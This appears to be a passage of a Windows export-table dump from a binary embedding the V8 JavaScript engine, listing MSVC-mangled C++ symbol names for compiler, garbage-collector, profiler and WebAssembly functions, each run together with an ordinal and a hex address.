                                                                                                                                                                                                        ?Cmp@MacroAssembler@internal@v8@@QEAAXVOperand@23@V?$Handle@VObject@internal@v8@@@23@@Z43300x1405022b0
                                                                                                                                                                                                        ?Cmp@MacroAssembler@internal@v8@@QEAAXVRegister@23@V?$Handle@VObject@internal@v8@@@23@@Z43310x140502380
                                                                                                                                                                                                        ?Cmp@TurboAssembler@internal@v8@@QEAAXVOperand@23@VSmi@23@@Z43320x140502420
                                                                                                                                                                                                        ?Cmp@TurboAssembler@internal@v8@@QEAAXVRegister@23@H@Z43330x1405024c0
                                                                                                                                                                                                        ?Cmp@TurboAssembler@internal@v8@@QEAAXVRegister@23@VSmi@23@@Z43340x140502500
                                                                                                                                                                                                        ?CmpInstanceType@MacroAssembler@internal@v8@@QEAAXVRegister@23@W4InstanceType@23@@Z43350x140502580
                                                                                                                                                                                                        ?CmpInstanceTypeRange@MacroAssembler@internal@v8@@QEAAXVRegister@23@W4InstanceType@23@1@Z43360x1405025f0
                                                                                                                                                                                                        ?CmpObjectType@MacroAssembler@internal@v8@@QEAAXVRegister@23@W4InstanceType@23@0@Z43370x140502710
                                                                                                                                                                                                        ?Code@JSRegExp@internal@v8@@QEBA?AVObject@23@_N@Z43380x14082cc30
                                                                                                                                                                                                        ?CodeCreateEvent@CodeEventLogger@internal@v8@@UEAAXW4LogEventsAndTags@CodeEventListener@23@PEBVWasmCode@wasm@23@V?$Vector@$$CBD@base@3@PEBDHH@Z43390x1408d25c0
                                                                                                                                                                                                        ?CodeCreateEvent@CodeEventLogger@internal@v8@@UEAAXW4LogEventsAndTags@CodeEventListener@23@V?$Handle@VAbstractCode@internal@v8@@@23@PEBD@Z43400x1408d2750
                                                                                                                                                                                                        ?CodeCreateEvent@CodeEventLogger@internal@v8@@UEAAXW4LogEventsAndTags@CodeEventListener@23@V?$Handle@VAbstractCode@internal@v8@@@23@V?$Handle@VName@internal@v8@@@23@@Z43410x1408d2800
                                                                                                                                                                                                        ?CodeCreateEvent@CodeEventLogger@internal@v8@@UEAAXW4LogEventsAndTags@CodeEventListener@23@V?$Handle@VAbstractCode@internal@v8@@@23@V?$Handle@VSharedFunctionInfo@internal@v8@@@23@V?$Handle@VName@internal@v8@@@23@@Z43420x1408d2860
                                                                                                                                                                                                        ?CodeCreateEvent@CodeEventLogger@internal@v8@@UEAAXW4LogEventsAndTags@CodeEventListener@23@V?$Handle@VAbstractCode@internal@v8@@@23@V?$Handle@VSharedFunctionInfo@internal@v8@@@23@V?$Handle@VName@internal@v8@@@23@HH@Z43430x1408d2940
                                                                                                                                                                                                        ?CodeCreateEvent@ProfilerListener@internal@v8@@UEAAXW4LogEventsAndTags@CodeEventListener@23@PEBVWasmCode@wasm@23@V?$Vector@$$CBD@base@3@PEBDHH@Z43440x14074a3d0
                                                                                                                                                                                                        ?CodeCreateEvent@ProfilerListener@internal@v8@@UEAAXW4LogEventsAndTags@CodeEventListener@23@V?$Handle@VAbstractCode@internal@v8@@@23@PEBD@Z43450x14074a560
                                                                                                                                                                                                        ?CodeCreateEvent@ProfilerListener@internal@v8@@UEAAXW4LogEventsAndTags@CodeEventListener@23@V?$Handle@VAbstractCode@internal@v8@@@23@V?$Handle@VName@internal@v8@@@23@@Z43460x14074a6b0
                                                                                                                                                                                                        ?CodeCreateEvent@ProfilerListener@internal@v8@@UEAAXW4LogEventsAndTags@CodeEventListener@23@V?$Handle@VAbstractCode@internal@v8@@@23@V?$Handle@VSharedFunctionInfo@internal@v8@@@23@V?$Handle@VName@internal@v8@@@23@@Z43470x14074a800
                                                                                                                                                                                                        ?CodeCreateEvent@ProfilerListener@internal@v8@@UEAAXW4LogEventsAndTags@CodeEventListener@23@V?$Handle@VAbstractCode@internal@v8@@@23@V?$Handle@VSharedFunctionInfo@internal@v8@@@23@V?$Handle@VName@internal@v8@@@23@HH@Z43480x14074aa10
                                                                                                                                                                                                        ?CodeDeoptEvent@CodeEventLogger@internal@v8@@UEAAXV?$Handle@VCode@internal@v8@@@23@W4DeoptimizeKind@23@_KH_N@Z43490x140078990
                                                                                                                                                                                                        ?CodeDeoptEvent@ProfilerListener@internal@v8@@UEAAXV?$Handle@VCode@internal@v8@@@23@W4DeoptimizeKind@23@_KH_N@Z43500x14074b5d0
                                                                                                                                                                                                        ?CodeDependencyChangeEvent@CodeEventLogger@internal@v8@@UEAAXV?$Handle@VCode@internal@v8@@@23@V?$Handle@VSharedFunctionInfo@internal@v8@@@23@PEBD@Z43510x140078990
                                                                                                                                                                                                        ?CodeDependencyChangeEvent@ProfilerListener@internal@v8@@UEAAXV?$Handle@VCode@internal@v8@@@23@V?$Handle@VSharedFunctionInfo@internal@v8@@@23@PEBD@Z43520x140078990
                                                                                                                                                                                                        ?CodeDisableOptEvent@ProfilerListener@internal@v8@@UEAAXV?$Handle@VAbstractCode@internal@v8@@@23@V?$Handle@VSharedFunctionInfo@internal@v8@@@23@@Z43530x14074b6a0
                                                                                                                                                                                                        ?CodeEntry@TurboAssembler@internal@v8@@QEAAXXZ43540x140078990
                                                                                                                                                                                                        ?CodeEventHandler@ProfilerCodeObserver@internal@v8@@UEAAXAEBVCodeEventsContainer@23@@Z43550x1407611e0
                                                                                                                                                                                                        ?CodeEventHandler@ProfilerEventsProcessor@internal@v8@@UEAAXAEBVCodeEventsContainer@23@@Z43560x140761200
                                                                                                                                                                                                        ?CodeEventHandlerInternal@ProfilerCodeObserver@internal@v8@@AEAAXAEBVCodeEventsContainer@23@@Z43570x1407612a0
                                                                                                                                                                                                        ?CodeMoveEvent@ProfilerListener@internal@v8@@UEAAXVAbstractCode@23@0@Z43580x14074b730
                                                                                                                                                                                                        ?CodeMovingGCEvent@CodeEventLogger@internal@v8@@UEAAXXZ43590x140078990
                                                                                                                                                                                                        ?CodeMovingGCEvent@ProfilerListener@internal@v8@@UEAAXXZ43600x140078990
                                                                                                                                                                                                        ?CodeObject@TurboAssemblerBase@internal@v8@@QEBA?AV?$Handle@VHeapObject@internal@v8@@@23@XZ43610x14049b900
                                                                                                                                                                                                        ?CodePageGuardSize@MemoryChunkLayout@internal@v8@@SA_KXZ43620x140973b80
                                                                                                                                                                                                        ?CodePageGuardStartOffset@MemoryChunkLayout@internal@v8@@SA_KXZ43630x140973b90
                                                                                                                                                                                                        ?CodeSweepEvent@ProfilerListener@internal@v8@@QEAAXXZ43640x14074b7f0
                                                                                                                                                                                                        ?CodeTargetAlign@Assembler@internal@v8@@QEAAXXZ43650x14050c670
                                                                                                                                                                                                        ?CollapseNaryExpression@Parser@internal@v8@@AEAA_NPEAPEAVExpression@23@PEAV423@W4Value@Token@23@HAEBUSourceRange@23@@Z43660x1407a48d0
                                                                                                                                                                                                        ?Collect@FeedbackNexus@internal@v8@@QEAAXV?$Handle@VString@internal@v8@@@23@H@Z43670x140879480
                                                                                                                                                                                                        ?Collect@TypeProfile@debug@v8@@SA?AV123@PEAVIsolate@3@@Z43680x140a6e050
                                                                                                                                                                                                        ?CollectAllAvailableGarbage@Heap@internal@v8@@QEAAXW4GarbageCollectionReason@23@@Z43690x1409b0d80
                                                                                                                                                                                                        ?CollectAllGarbage@Heap@internal@v8@@QEAAXHW4GarbageCollectionReason@23@W4GCCallbackFlags@3@@Z43700x1409b12c0
                                                                                                                                                                                                        ?CollectArrayAndObjectPrototypes@JSHeapBroker@compiler@internal@v8@@AEAAXXZ43710x140f2e500
                                                                                                                                                                                                        ?CollectBestEffort@Coverage@debug@v8@@SA?AV123@PEAVIsolate@3@@Z43720x140a6e100
                                                                                                                                                                                                        ?CollectControlProjections@NodeProperties@compiler@internal@v8@@SAXPEAVNode@234@PEAPEAV5234@_K@Z43730x140eac680
                                                                                                                                                                                                        ?CollectCustomSpaceStatisticsAtLastGC@CppHeap@internal@v8@@QEAAXV?$vector@UCustomSpaceIndex@cppgc@@V?$allocator@UCustomSpaceIndex@cppgc@@@std@@@std@@V?$unique_ptr@VCustomSpaceStatisticsReceiver@v8@@U?$default_delete@VCustomSpaceStatisticsReceiver@v8@@@std@@@5@@Z43740x1409e9600
                                                                                                                                                                                                        ?CollectCustomSpaceStatisticsAtLastGC@CppHeap@v8@@QEAAXV?$vector@UCustomSpaceIndex@cppgc@@V?$allocator@UCustomSpaceIndex@cppgc@@@std@@@std@@V?$unique_ptr@VCustomSpaceStatisticsReceiver@v8@@U?$default_delete@VCustomSpaceStatisticsReceiver@v8@@@std@@@4@@Z43750x1409e9890
                                                                                                                                                                                                        ?CollectDeoptInfo@ProfileNode@internal@v8@@QEAAXPEAVCodeEntry@23@@Z43760x14074dac0
                                                                                                                                                                                                        ?CollectGarbage@GCInvoker@internal@cppgc@@UEAAXUConfig@GarbageCollector@23@@Z43770x140465d40
                                                                                                                                                                                                        ?CollectGarbage@Heap@internal@cppgc@@UEAAXUConfig@GarbageCollector@23@@Z43780x1404620a0
                                                                                                                                                                                                        ?CollectGarbage@Heap@internal@v8@@QEAA_NW4AllocationSpace@23@W4GarbageCollectionReason@23@W4GCCallbackFlags@3@@Z43790x1409b14e0
                                                                                                                                                                                                        ?CollectGarbageForTesting@CppHeap@internal@v8@@QEAAXW4EmbedderStackState@cppgc@@@Z43800x1409e9970
                                                                                                                                                                                                        ?CollectGarbageForTesting@CppHeap@v8@@QEAAXW4EmbedderStackState@cppgc@@@Z43810x1409e9a40
                                                                                                                                                                                                        ?CollectGlobalObjectsTags@V8HeapExplorer@internal@v8@@QEAAXXZ43820x140753570
                                                                                                                                                                                                        ?CollectNonLocals@DeclarationScope@internal@v8@@QEAA?AV?$Handle@VStringSet@internal@v8@@@23@PEAVIsolate@23@V423@@Z43830x140af38d0
                                                                                                                                                                                                        ?CollectNonLocals@Scope@internal@v8@@AEAAXPEAVDeclarationScope@23@PEAVIsolate@23@PEAV?$Handle@VStringSet@internal@v8@@@23@@Z43840x140af3910
                                                                                                                                                                                                        ?CollectPrecise@Coverage@debug@v8@@SA?AV123@PEAVIsolate@3@@Z43850x140a6e170
                                                                                                                                                                                                        ?CollectSample@CpuProfiler@internal@v8@@QEAAXXZ43860x140761570
                                                                                                                                                                                                        ?CollectSample@CpuProfiler@internal@v8@@SAXPEAVIsolate@23@@Z43870x140761590
                                                                                                                                                                                                        ?CollectSample@CpuProfiler@v8@@SAXPEAVIsolate@2@@Z43880x140b0bd10
                                                                                                                                                                                                        ?CollectSharedGarbage@Heap@internal@v8@@QEAAXW4GarbageCollectionReason@23@@Z43890x1409b25d0
                                                                                                                                                                                                        ?CollectSourcePositions@Compiler@internal@v8@@SA_NPEAVIsolate@23@V?$Handle@VSharedFunctionInfo@internal@v8@@@23@@Z43900x140aa6ba0
                                                                                                                                                                                                        ?CollectSourcePositionsForAllBytecodeArrays@Isolate@internal@v8@@QEAAXXZ43910x140a0e330
                                                                                                                                                                                                        ?CollectStatistics@CppHeap@v8@@QEAA?AUHeapStatistics@cppgc@@W4DetailLevel@34@@Z43920x1409e9a60
                                                                                                                                                                                                        ?CollectStatistics@FreeList@internal@cppgc@@QEAAXAEAUFreeListStatistics@HeapStatistics@3@@Z43930x140466f50
                                                                                                                                                                                                        ?CollectStatistics@HeapBase@internal@cppgc@@QEAA?AUHeapStatistics@3@W4DetailLevel@43@@Z43940x140465640
                                                                                                                                                                                                        ?CollectTypeProfile@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@H@Z43950x14091b120
                                                                                                                                                                                                        ?CollectValueProjections@NodeProperties@compiler@internal@v8@@SAXPEAVNode@234@PEAPEAV5234@_K@Z43960x140eac7c0
                                                                                                                                                                                                        ?ColumnOffset@Script@debug@v8@@QEBAHXZ43970x140475550
                                                                                                                                                                                                        ?CombineSpeedsInBytesPerMillisecond@GCTracer@internal@v8@@SANNN@Z43980x1409c86e0
                                                                                                                                                                                                        ?CombineSurrogatePair@Scanner@internal@v8@@AEAA_NXZ43990x140482e40
                                                                                                                                                                                                        ?CombinedMarkCompactSpeedInBytesPerMillisecond@GCTracer@internal@v8@@QEAANXZ44000x1409c8700
                                                                                                                                                                                                        ?Comment@CodeAssembler@compiler@internal@v8@@QEAAXPEBD@Z44010x140078990
                                                                                                                                                                                                        ?Comment@CodeAssembler@compiler@internal@v8@@QEAAXV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z44020x14049bed0
                                                                                                                                                                                                        ?Comment@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@PEBD@Z44030x140eca5a0
                                                                                                                                                                                                        ?Comment@RawMachineAssembler@compiler@internal@v8@@QEAAXAEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z44040x14108c6b0
                                                                                                                                                                                                        ?CommentForOffHeapTrampoline@TurboAssemblerBase@internal@v8@@QEAA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PEBDW4Builtin@23@@Z44050x14049b910
                                                                                                                                                                                                        ?Commit@CompilationDependencies@compiler@internal@v8@@QEAA_NV?$Handle@VCode@internal@v8@@@34@@Z44060x140f33520
                                                                                                                                                                                                        ?Commit@WasmCodeManager@wasm@internal@v8@@AEAAXVAddressRegion@base@4@@Z44070x140569240
                                                                                                                                                                                                        ?CommitFromSpaceIfNeeded@NewSpace@internal@v8@@QEAA_NXZ44080x140482f20
                                                                                                                                                                                                        ?CommitPageSize@BoundedPageAllocator@base@v8@@UEAA_KXZ44090x140078d30
                                                                                                                                                                                                        ?CommitPageSize@OS@base@v8@@CA_KXZ44100x140e5fcf0
                                                                                                                                                                                                        ?CommitPageSize@PageAllocator@base@v8@@UEAA_KXZ44110x140078d20
                                                                                                                                                                                                        ?CommitPageSize@internal@v8@@YA_KXZ44120x1406b5700
                                                                                                                                                                                                        ?CommitReservedEntry@ConstantArrayBuilder@interpreter@internal@v8@@QEAA_KW4OperandSize@234@VSmi@34@@Z44130x1408f5170
                                                                                                                                                                                                        ?CommitSpillMoves@TopLevelLiveRange@compiler@internal@v8@@QEAAXPEAVTopTierRegisterAllocationData@234@AEBVInstructionOperand@234@@Z44140x140f82d00
                                                                                                                                                                                                        ?CommittedMemory@BaseSpace@internal@v8@@UEAA_KXZ44150x140482f50
                                                                                                                                                                                                        ?CommittedMemory@NewSpace@internal@v8@@UEAA_KXZ44160x140482f60
                                                                                                                                                                                                        ?CommittedPhysicalMemory@LargeObjectSpace@internal@v8@@UEAA_KXZ44170x1409a5170
                                                                                                                                                                                                        ?CommittedPhysicalMemory@MemoryChunk@internal@v8@@QEAA_KXZ44180x1409732f0
                                                                                                                                                                                                        ?CommittedPhysicalMemory@NewSpace@internal@v8@@UEAA_KXZ44190x14096f370
                                                                                                                                                                                                        ?CommittedPhysicalMemory@PagedSpace@internal@v8@@UEAA_KXZ44200x140964630
                                                                                                                                                                                                        ?CommittedPhysicalMemory@ReadOnlySpace@internal@v8@@UEAA_KXZ44210x140962fd0
                                                                                                                                                                                                        ?Compact@OSROptimizedCodeCache@internal@v8@@SAXV?$Handle@VNativeContext@internal@v8@@@23@@Z44220x1407df970
                                                                                                                                                                                                        ?Compact@PrototypeUsers@internal@v8@@SA?AVWeakArrayList@23@V?$Handle@VWeakArrayList@internal@v8@@@23@PEAVHeap@23@P6AXVHeapObject@23@HH@ZW4AllocationType@23@@Z44230x1407f32b0
                                                                                                                                                                                                        ?Compact@WeakArrayList@internal@v8@@QEAAXPEAVIsolate@23@@Z44240x1407f3590
                                                                                                                                                                                                        ?CompactSpacesIfEnabled@Compactor@internal@cppgc@@QEAA?AW4CompactableSpaceHandling@SweepingConfig@Sweeper@23@XZ44250x140469380
                                                                                                                                                                                                        ?CompactWeakArrayList@Factory@internal@v8@@QEAA?AV?$Handle@VWeakArrayList@internal@v8@@@23@V423@HW4AllocationType@23@@Z44260x1409cf760
                                                                                                                                                                                                        ?CompactionSpeedInBytesPerMillisecond@GCTracer@internal@v8@@QEBANXZ44270x1409c87b0
                                                                                                                                                                                                        ?Compare@Bignum@base@v8@@SAHAEBV123@0@Z44280x140e70620
                                                                                                                                                                                                        ?Compare@InstructionOperand@compiler@internal@v8@@QEBA_NAEBV1234@@Z44290x1404bb640
                                                                                                                                                                                                        ?Compare@Object@internal@v8@@SA?AV?$Maybe@W4ComparisonResult@internal@v8@@@3@PEAVIsolate@23@V?$Handle@VObject@internal@v8@@@23@1@Z44300x1407f36d0
                                                                                                                                                                                                        ?CompareCanonicalized@InstructionOperand@compiler@internal@v8@@QEBA_NAEBV1234@@Z44310x1404bb650
                                                                                                                                                                                                        ?CompareExchangeStatus@Cancelable@internal@v8@@AEAA_NW4Status@123@0PEAW44123@@Z44320x140482fa0
                                                                                                                                                                                                        ?CompareMaps@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@V?$ZoneHandleSet@VMap@internal@v8@@@34@@Z44330x140f4dbc0
                                                                                                                                                                                                        ?CompareNil@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@W4Value@Token@34@W4NilValue@1234@@Z44340x14091b270
                                                                                                                                                                                                        ?CompareNull@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@XZ44350x14091b290
                                                                                                                                                                                                        ?CompareOperation@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@W4Value@Token@34@VRegister@234@H@Z44360x14091b3c0
                                                                                                                                                                                                        ?CompareReference@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@VRegister@234@@Z44370x14091be20
                                                                                                                                                                                                        ?CompareRoot@TurboAssembler@internal@v8@@QEAAXVOperand@23@W4RootIndex@23@@Z44380x140502760
                                                                                                                                                                                                        ?CompareRoot@TurboAssembler@internal@v8@@QEAAXVRegister@23@W4RootIndex@23@@Z44390x1405027d0
                                                                                                                                                                                                        ?CompareStrings@LiveEdit@internal@v8@@SAXPEAVIsolate@23@V?$Handle@VString@internal@v8@@@23@1PEAV?$vector@USourceChangeRange@internal@v8@@V?$allocator@USourceChangeRange@internal@v8@@@std@@@std@@@Z44400x140a583c0
                                                                                                                                                                                                        ?CompareToDouble@BigInt@internal@v8@@SA?AW4ComparisonResult@23@V?$Handle@VBigInt@internal@v8@@@23@N@Z44410x1408c5b40
                                                                                                                                                                                                        ?CompareTypeOf@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@W4LiteralFlag@TestTypeOfFlags@234@@Z44420x14091bfd0
                                                                                                                                                                                                        ?CompareUndefined@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@XZ44430x14091c120
                                                                                                                                                                                                        ?CompareUndetectable@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@XZ44440x14091c250
                                                                                                                                                                                                        ?Compile@Compiler@internal@v8@@SA_NPEAVIsolate@23@V?$Handle@VJSFunction@internal@v8@@@23@W4ClearExceptionFlag@123@PEAVIsCompiledScope@23@@Z44450x140aa7100
                                                                                                                                                                                                        ?Compile@Compiler@internal@v8@@SA_NPEAVIsolate@23@V?$Handle@VSharedFunctionInfo@internal@v8@@@23@W4ClearExceptionFlag@123@PEAVIsCompiledScope@23@@Z44460x140aa74a0
                                                                                                                                                                                                        ?Compile@Script@v8@@SA?AV?$MaybeLocal@VScript@v8@@@2@V?$Local@VContext@v8@@@2@V?$Local@VString@v8@@@2@PEAVScriptOrigin@2@@Z44470x140b0bd20
                                                                                                                                                                                                        ?Compile@ScriptCompiler@v8@@SA?AV?$MaybeLocal@VScript@v8@@@2@V?$Local@VContext@v8@@@2@PEAVSource@12@W4CompileOptions@12@W4NoCacheReason@12@@Z44480x140b0bda0
                                                                                                                                                                                                        ?Compile@ScriptCompiler@v8@@SA?AV?$MaybeLocal@VScript@v8@@@2@V?$Local@VContext@v8@@@2@PEAVStreamedSource@12@V?$Local@VString@v8@@@2@AEBVScriptOrigin@2@@Z44490x140b0bea0
                                                                                                                                                                                                        ?CompileBaseline@Compiler@internal@v8@@SA_NPEAVIsolate@23@V?$Handle@VJSFunction@internal@v8@@@23@W4ClearExceptionFlag@123@PEAVIsCompiledScope@23@@Z44500x140aa8100
                                                                                                                                                                                                        ?CompileCWasmEntry@compiler@internal@v8@@YA?AV?$Handle@VCode@internal@v8@@@23@PEAVIsolate@23@PEBV?$Signature@VValueType@wasm@internal@v8@@@23@PEBUWasmModule@wasm@23@@Z44510x140ef71f0
                                                                                                                                                                                                        ?CompileError@ErrorThrower@wasm@internal@v8@@QEAAXPEBDZZ44520x14052b3e0
                                                                                                                                                                                                        ?CompileError_string@Factory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ44530x140482fc0
                                                                                                                                                                                                        ?CompileError_string@LocalFactory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ44540x1406cd5c0
                                                                                                                                                                                                        ?CompileFailed@ErrorThrower@wasm@internal@v8@@QEAAXAEBVWasmError@234@@Z44550x140528530
                                                                                                                                                                                                        ?CompileForLiveEdit@Compiler@internal@v8@@SA?AV?$MaybeHandle@VSharedFunctionInfo@internal@v8@@@23@PEAVParseInfo@23@V?$Handle@VScript@internal@v8@@@23@PEAVIsolate@23@@Z44560x140aa81f0
                                                                                                                                                                                                        ?CompileForTesting@RegExp@internal@v8@@SA_NPEAVIsolate@23@PEAVZone@23@PEAURegExpCompileData@23@V?$Flags@W4Flag@JSRegExp@internal@v8@@H@base@3@V?$Handle@VString@internal@v8@@@23@4_N@Z44570x140717e40
                                                                                                                                                                                                        ?CompileFunction@WasmEngine@wasm@internal@v8@@QEAAXPEAVIsolate@34@PEAVNativeModule@234@IW4ExecutionTier@234@@Z44580x1405551d0
                                                                                                                                                                                                        ?CompileFunctionInContext@ScriptCompiler@v8@@SA?AV?$MaybeLocal@VFunction@v8@@@2@V?$Local@VContext@v8@@@2@PEAVSource@12@_KQEAV?$Local@VString@v8@@@2@2QEAV?$Local@VObject@v8@@@2@W4CompileOptions@12@W4NoCacheReason@12@PEAV?$Local@VScriptOrModule@v8@@@2@@Z44590x140b0c2c0
                                                                                                                                                                                                        ?CompileImportWrapper@wasm@internal@v8@@YAPEAVWasmCode@123@PEAVNativeModule@123@PEAVCounters@23@W4WasmImportCallKind@compiler@23@PEBV?$Signature@VValueType@wasm@internal@v8@@@23@HPEAVModificationScope@WasmImportWrapperCache@123@@Z44600x140595d60
                                                                                                                                                                                                        ?CompileJSToWasmWrapper@JSToWasmWrapperCompilationUnit@wasm@internal@v8@@SA?AV?$Handle@VCode@internal@v8@@@34@PEAVIsolate@34@PEBV?$Signature@VValueType@wasm@internal@v8@@@34@PEBUWasmModule@234@_N@Z44610x1405bf9f0
                                                                                                                                                                                                        ?CompileJsToWasmWrappers@wasm@internal@v8@@YAXPEAVIsolate@23@PEBUWasmModule@123@PEAV?$Handle@VFixedArray@internal@v8@@@23@@Z44620x140595f60
                                                                                                                                                                                                        ?CompileModule@ScriptCompiler@v8@@SA?AV?$MaybeLocal@VModule@v8@@@2@PEAVIsolate@2@PEAVSource@12@W4CompileOptions@12@W4NoCacheReason@12@@Z44630x140b0cb50
                                                                                                                                                                                                        ?CompileModule@ScriptCompiler@v8@@SA?AV?$MaybeLocal@VModule@v8@@@2@V?$Local@VContext@v8@@@2@PEAVStreamedSource@12@V?$Local@VString@v8@@@2@AEBVScriptOrigin@2@@Z44640x140b0cca0
                                                                                                                                                                                                        ?CompileNext@OptimizingCompileDispatcher@internal@v8@@AEAAXPEAVOptimizedCompilationJob@23@PEAVLocalIsolate@23@@Z44650x140a7a7d0
                                                                                                                                                                                                        ?CompileOptimized@Compiler@internal@v8@@SA_NPEAVIsolate@23@V?$Handle@VJSFunction@internal@v8@@@23@W4ConcurrencyMode@23@W4CodeKind@23@@Z44660x140aa8220
                                                                                                                                                                                                        ?CompileSharedWithBaseline@Compiler@internal@v8@@SA_NPEAVIsolate@23@V?$Handle@VSharedFunctionInfo@internal@v8@@@23@W4ClearExceptionFlag@123@PEAVIsCompiledScope@23@@Z44670x140aa8940
                                                                                                                                                                                                        ?CompileSpecificJSToWasmWrapper@JSToWasmWrapperCompilationUnit@wasm@internal@v8@@SA?AV?$Handle@VCode@internal@v8@@@34@PEAVIsolate@34@PEBV?$Signature@VValueType@wasm@internal@v8@@@34@PEBUWasmModule@234@@Z44680x1405bfa90
                                                                                                                                                                                                        ?CompileToplevel@Compiler@internal@v8@@SA?AV?$MaybeHandle@VSharedFunctionInfo@internal@v8@@@23@PEAVParseInfo@23@V?$Handle@VScript@internal@v8@@@23@PEAVIsolate@23@PEAVIsCompiledScope@23@@Z44690x140aa9620
                                                                                                                                                                                                        ?CompileUnboundInternal@ScriptCompiler@v8@@CA?AV?$MaybeLocal@VUnboundScript@v8@@@2@PEAVIsolate@2@PEAVSource@12@W4CompileOptions@12@W4NoCacheReason@12@@Z44700x140b0d190
                                                                                                                                                                                                        ?CompileUnboundScript@ScriptCompiler@v8@@SA?AV?$MaybeLocal@VUnboundScript@v8@@@2@PEAVIsolate@2@PEAVSource@12@W4CompileOptions@12@W4NoCacheReason@12@@Z44710x140b0d680
                                                                                                                                                                                                        ?CompileWasmFunction@WasmCompilationUnit@wasm@internal@v8@@SAXPEAVIsolate@34@PEAVNativeModule@234@PEAVWasmFeatures@234@PEBUWasmFunction@234@W4ExecutionTier@234@@Z44720x1405bfb60
                                                                                                                                                                                                        ?CompileWasmImportCallWrapper@compiler@internal@v8@@YA?AUWasmCompilationResult@wasm@23@PEAUCompilationEnv@523@W4WasmImportCallKind@123@PEBV?$Signature@VValueType@wasm@internal@v8@@@23@_NH@Z44730x140ef7f60
                                                                                                                                                                                                        ?CompleteInobjectSlackTracking@Map@internal@v8@@QEAAXPEAVIsolate@23@@Z44740x14080f270
                                                                                                                                                                                                        ?Compress@SnapshotCompression@internal@v8@@SA?AVSnapshotData@23@PEBV423@@Z44750x1406c49d0
                                                                                                                                                                                                        ?CompressBlock@MoveOptimizer@compiler@internal@v8@@AEAAXPEAVInstructionBlock@234@@Z44760x140f76500
                                                                                                                                                                                                        ?CompressGaps@MoveOptimizer@compiler@internal@v8@@AEAAXPEAVInstruction@234@@Z44770x140f765f0
                                                                                                                                                                                                        ?CompressMoves@MoveOptimizer@compiler@internal@v8@@AEAAXPEAVParallelMove@234@PEAV?$ZoneVector@PEAVMoveOperands@compiler@internal@v8@@@34@@Z44780x140f766d0
                                                                                                                                                                                                        ?CompressedHeapConstant@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBV?$Handle@VHeapObject@internal@v8@@@34@@Z44790x140eb2610
                                                                                                                                                                                                        ?Compute@GCIdleTimeHandler@internal@v8@@QEAA?AW4GCIdleTimeAction@23@NVGCIdleTimeHeapState@23@@Z44800x1409cc680
                                                                                                                                                                                                        ?ComputeAndSetHash@String@internal@v8@@AEAAIAEBVSharedStringAccessGuardIfNeeded@23@@Z44810x1407c3960
                                                                                                                                                                                                        ?ComputeAndSetHash@String@internal@v8@@AEAAIXZ44820x1407c3c30
                                                                                                                                                                                                        ?ComputeAssemblyOrder@InstructionSequence@compiler@internal@v8@@AEAAXXZ44830x140ea8d70
                                                                                                                                                                                                        ?ComputeBranchInfo@CodeGenerator@compiler@internal@v8@@AEAA?AVRpoNumber@234@PEAUBranchInfo@234@PEAVInstruction@234@@Z44840x140ee72a0
                                                                                                                                                                                                        ?ComputeCallFrequency@FeedbackNexus@internal@v8@@QEAAMXZ44850x140879800
                                                                                                                                                                                                        ?ComputeCapacity@HashTableBase@internal@v8@@SAHH@Z44860x140482fd0
                                                                                                                                                                                                        ?ComputeCapacityWithShrink@?$HashTable@VCompilationCacheTable@internal@v8@@VCompilationCacheShape@23@@internal@v8@@KAHHH@Z44870x1407f3aa0
                                                                                                                                                                                                        ?ComputeCapacityWithShrink@?$HashTable@VEphemeronHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@KAHHH@Z44880x1407f3aa0
                                                                                                                                                                                                        ?ComputeCapacityWithShrink@?$HashTable@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@KAHHH@Z44890x1407f3aa0
                                                                                                                                                                                                        ?ComputeCapacityWithShrink@?$HashTable@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@KAHHH@Z44900x1407f3aa0
                                                                                                                                                                                                        ?ComputeCapacityWithShrink@?$HashTable@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@KAHHH@Z44910x1407f3aa0
                                                                                                                                                                                                        ?ComputeCapacityWithShrink@?$HashTable@VObjectHashSet@internal@v8@@VObjectHashSetShape@23@@internal@v8@@KAHHH@Z44920x1407f3aa0
                                                                                                                                                                                                        ?ComputeCapacityWithShrink@?$HashTable@VObjectHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@KAHHH@Z44930x1407f3aa0
                                                                                                                                                                                                        ?ComputeCapacityWithShrink@?$HashTable@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@KAHHH@Z44940x1407f3aa0
                                                                                                                                                                                                        ?ComputeCapacityWithShrink@?$HashTable@VStringSet@internal@v8@@VStringSetShape@23@@internal@v8@@KAHHH@Z44950x1407f3aa0
                                                                                                                                                                                                        ?ComputeCodeStartAddress@TurboAssembler@internal@v8@@QEAAXVRegister@23@@Z44960x140502880
                                                                                                                                                                                                        ?ComputeConfiguration@LookupIterator@internal@v8@@CA?AW4Configuration@123@PEAVIsolate@23@W44123@V?$Handle@VName@internal@v8@@@23@@Z44970x140482ff0
                                                                                                                                                                                                        ?ComputeDiscardMemoryArea@MemoryAllocator@internal@v8@@SA?AVAddressRegion@base@3@_K0@Z44980x140974d60
